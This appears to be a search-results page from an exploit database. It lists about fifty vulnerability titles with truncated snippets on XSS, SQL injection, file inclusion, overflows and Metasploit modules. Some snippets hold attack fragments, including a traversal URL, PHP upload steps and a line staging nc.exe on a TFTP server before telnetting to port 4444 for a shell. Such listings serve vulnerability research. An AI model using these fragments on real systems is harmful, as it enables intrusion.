56796 matches found
FreeFloat FTP Server REST Buffer Overflow (MSF)
No description provided by source...
Contrexx CMS 1.0.x Index.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/17128/info Contrexx CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary...
Campsite CMS remote Persistent XSS vulnerability
No description provided by source. Exploit Title: Campsite CMS remote Persistent XSS vulnerability Date: 15th july 2010 Author: D4rk357 Critical:Low Contact:bd4rk357atyahoodotin Software Link:bhttp://www.sourcefabric.org/en/home/web/78/Demo--Documentation.htm?tpl=18 Greetz to:bb0nd,...
All In One Control Panel 1.3.x cp_downloads.php did Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/22032/info All In One Control Panel is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an...
Rational Software Hidden Administrator 1.7 - Auth Bypass Exploit
No description provided by source. Hidden Administrator Authenticaiton Bypass Exploit ahmedatrewterz.com http://www.securityfocus.com/bid/24049 C:\python rewt-ha-exp.py Usage: rewt-ha-exp.py -h host ip -p port -t tftpd server ip make sure nc.exe exists on tftpd server C:\telnet 192.168.1.4 4444...
Basit 1.0 Search Module Cross Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/7142/info A cross-site scripting vulnerability has been reported for Basit. This vulnerability occurs due to insufficient sanitization of some user-supplied input. As a result of this deficiency an attacker may exploit th...
MPM Guestbook 1.2 Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8958/info MPM Guestbook is reported to be prone to a cross-site scripting vulnerability. This is due to insufficient sanitization of HTML from URI parameters, which will be displayed in web pages that are dynamically...
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote BOF Exploit
No description provided by source. !/usr/bin/python ProSysInfo TFTP Server TFTPDWIN 0.4.2 Coded by Wraith import os import sys import struct import socket import time print \nProSysInfo TFTP Server TFTPDWIN 0.4.2 print Note: This vuln is sensitive to different buffer length\n if lensys.argv!=2:...
Scorched 3D <= 39.1 - Multiple Vulnerabilities (All-in-One) (PoC)
No description provided by source. / by Luigi Auriemma / include stdio.h include stdlib.h include string.h include stdarg.h include time.h include zlib.h ifdef WIN32 include winsock.h / Header file used for manage errors in Windows It support socket and errno too this header replace the previous...
SkyBlueCanvas CMS - Remote Code Execution
No description provided by source. This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def...
McKesson Pathways Homecare 6.5 Weak Username and Password Encryption Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/3653/info McKesson Pathways Homecare is a client/server application which is used to track patient information, billing information and medical records for home care patients. The administrative username and password are...
REZERVI 3.0.2 - Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ 0 0 \ \ /\ /\ \ \ \ /\ \ \ /\ /\ \ \ \ \ \ \ / 1 1 \ \ \...
PHP <= 5.2.1 - Multiple Functions Reference Parameter Information Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/23202/info PHP is prone to an information-disclosure vulnerability due to a design error. The vulnerability resides in various functions that accept parameters as references. Successful exploits will allow attackers to...
Joomla Component com_xgallery 1.0 - Local File Inclusion Vulnerability
No description provided by source. Exploit Title: Joomla Component comxgallery 1.0 Local File Inclusion Vulnerability Author: KelvinX [email protected] Websites: http://xgroup.vn, http://kelvinx.net, http://facebook.com/kelvinxgr Date: December, 21-2010 Location: HCM City, Vietnam...
Cartweaver 2.16.11 Results.cfm category Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/17941/info Cartweaver ColdFusion is prone to SQL-injection vulnerabilities. These issues are due to the application's failure to properly sanitize user-supplied input before using it in SQL queries. Successful exploits...
nginx 0.7.61 - WebDAV Directory Traversal
No description provided by source. Bug Title: nginx webdav copy/move method directory traversal Program: nginx Version: nginx/0.7.61 - other versions may also be affected Website: http://sysoev.ru/nginx/ Severity: Low Date discovered: 23 September 2009 The webdav component has to be enabled and t...
Magic List Pro view_archive.cfm ListID Parameter SQL Injection
No description provided by source. source: http://www.securityfocus.com/bid/15774/info CFMagic Products are prone to multiple input validation vulnerabilities. These are due to a lack of proper sanitization of user-supplied input. These vulnerabilities allow an attacker to inject malicious SQL co...
IBM Websphere Edge Server 3.69/4.0 HTTP Header Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/6001/info A vulnerability has been discovered in the Caching Proxy component bundled with the IBM Websphere Edge Server. Due to insufficient sanitization of user-supplied input it is possible for an attacker to construct ...
Magic Photo Storage Website user/user_membership_password.php _config[site_path] Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the...
Magic Photo Storage Website user/login.php _config[site_path] Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the...
netwin netauth 4.2 - Directory Traversal vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/1587/info A remote user is capable of gaining read access to any known file residing on a host running Netwin Netauth through directory traversal. Appending a series of '../' and the desired file name to the 'page' variab...
pChart 2.1.3 - Multiple Vulnerabilities
No description provided by source. Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS Date: 2014-01-24 Exploit Author: Balazs Makany Vendor Homepage: www.pchart.net Software Link: www.pchart.net/download Google Dork: intitle:pChart 2.x - examples intext:2.1.3 Version: 2.1.3 Tested...
WebCalendar <= 1.2.4 (install/index.php) Remote Code Execution
No description provided by source. ?php / ----------------------------------------------------------------------- WebCalendar = 1.2.4 install/index.php Remote Code Executionn Exploit ----------------------------------------------------------------------- author..........: Egidio Romano aka EgiX...
Pure-FTPd 1.0.21 (CentOS 6.2 & Ubuntu 8.04) - Crash PoC (Null Pointer Dereference)
No description provided by source. Pure-FTPd Crash PoC Null Pointer Dereference, tested with pure-ftpd v1.0.21 centos 6.2, ubuntu 8.04 latest version v1.0.36 is not affected !! discovered by Kingcope root@ubuntu: grep seg /var/log/syslog Aug 13 13:55:28 ubuntu kernel: 226.791747 pure-ftpd4825:...
AWStats 5.x/6.x Logfile Parameter Remote Command Execution Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/12572/info AWStats is reported prone to a remote arbitrary command-execution vulnerability. This issue occurs because the application fails to properly sanitize user-supplied data. Specifically, the user-specified 'logfil...
Quicktech SQL Injection Vulnerability
No description provided by source. + Exploit Title : Quicktech Sql Injection Vulnerability + Author : eXeSoul + Contact : [email protected] + Date : 02-03-2011 + category: Web Apps SQli + HomePage : www.indishell.in + Version : all + Tested on : windows/linux + Vulnerability Style : PHP Sql...
Joomla Component (com_remository) Remote Upload File
No description provided by source. I N F O Exploit Title: Joomla comremository Remote Upload File Date: 2010-08-26 Author: J3yk0ob Home : http://www.J3yk0ob.com E X P L O I T 1. Register On Site 2. http://www.Target.com/index.php?option=comremository&Itemid=Itemid&func=addfile 3. Add your php fil...
phpBB <= 2.0.12 Change User Rights Authentication Bypass (c code)
No description provided by source. / Paisterist's code was nice but heres mil's version. precompiled: http://www.milw0rm.com/sploits/897.rar Usage: bcc32 897.cpp and place the exe in your firefox profile dir. Usually C:\Documents and Settings\Application...
File Sharing Software Easy File Sharing Web Server 1.2 Information Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8777/info Easy File Sharing Web Server has been reported prone to an information disclosure vulnerability. The issue presents itself due to insecure default permissions set on folders that contain Easy File Sharing Web...
PHP File Sharing System 1.5.1 - Multiple Vulnerabilities
No description provided by source. Title: PHP File Sharing System 1.5.1 Multiple Vulnerabilities Author: blake Tested on: Windows XP SP3 with xampplite 1 XSS http://192.168.1.149/fss/index.php?cam= 2 Directory transversal http://192.168.1.149/fss/index.php?cam=/../../../../../../../.. 3 Shell...
Shareplex 2.1.3 .9/2.2.2 beta Arbitary Local File Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/2535/info Shareplex is a database replication tool from Quest Software. Versions of the product contain a vulnerability which can permit local unprivileged users to read arbitrary files. The Qview component of Shareplex...
Pre E-Learning Portal 'search_result.asp' SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/38582/info Pre E-Learning Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to...
Serious Sam Engine 1.0.5 - Remote Denial of Service Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/8936/info It has been reported that Serious Sam game engine is vulnerable to a remote denial of service vulnerability due to a failure to handle exceptional conditions. This issue occurs when the client sends a certain...
Core Impact 7.5 - Denial of Service Vulnerability
No description provided by source. . . | / | | \ \ | / / |\ \ \ |/ // / /\ \ / |/ \ / // | / | | / \ \ / / // \ / \ |/| || \\ /|\ / / / / \ / \ / / / \ | | /\ /\ / \ | \ // est.2007 / / forum.darkc0de.com Greetz to all Darkc0de ,AI, AH,ICW Memebers Shoutz to...
MyPhotos 0.1.3b Index.PHP Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/20160/info MyPhotos is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue could allow an attacker to compromise the application and the...
Site-Assistant <= 0990 - (paths[version]) Remote File Include Exploit
No description provided by source. html head meta http-equiv=Content-Type content=text/html; charset=windows-1254 titleSite-Assistant = v0990pathsversionRemote File Include Exploit/title script language=JavaScript...
XFree86 4.3 Font Information File Buffer Overflow Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9636/info It has been reported that the XFree86 X Windows system is prone to a local buffer overflow vulnerability. The issue arises from improper bounds checking when parsing the 'font.alias' file. Successful exploitatio...
SonicWALL SSL VPN 1.3 3 WebCacheCleaner ActiveX FileDelete Method Traversal Arbitrary File Deletion
No description provided by source. source: http://www.securityfocus.com/bid/26288/info SonicWALL SSL VPN Client is prone to multiple remote vulnerabilities. The issues occur in different ActiveX controls and include arbitrary-file-deletion and multiple stack-based buffer-overflow vulnerabilities...
PicturesPro Photo Cart 3.9 - Search Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/30798/info Photo Cart is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. An attacker may leverage this issue to execute arbitrary script code in the browse...
Telekorn Signkorn Guestbook 1.x help/en/adminhelp2.php dir_path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. This may allow the attacker to compromise the application and t...
Telekorn Signkorn Guestbook 1.x admin/config.php dir_path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. This may allow the attacker to compromise the application and t...
Quantum DXi V1000 2.2.1 - Static SSH Key
No description provided by source...
PHP CGI Argument Injection Exploit
No description provided by source. Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit Date: May 4, 2012 Author: rayh4c0x4080sec0x2ecom Exploit Discovered by wofeiwo0x4080sec0x2ecom import socket import sys def cgiexploit: pwncode = ?php phpinfo;? postLength = lenpwncode httpraw=POST...
Fusion News 1.0 (fil_config) - Remote File Inclusion (RFI)
No description provided by source...
MS10-002 Internet Explorer Object Memory Use-After-Free
No description provided by source. This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core'...
Telekorn Signkorn Guestbook 1.x admin/admin.php dir_path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. This may allow the attacker to compromise the application and t...
Telekorn Signkorn Guestbook 1.x help/en/adminhelp3.php dir_path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. This may allow the attacker to compromise the application and t...
Telekorn Signkorn Guestbook 1.x help/en/adminhelp1.php dir_path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. This may allow the attacker to compromise the application and t...
Telekorn Signkorn Guestbook 1.x includes/functions.gb.php dir_path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. This may allow the attacker to compromise the application and t...
Telekorn Signkorn Guestbook 1.x help/de/adminhelp2.php dir_path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. This may allow the attacker to compromise the application and t...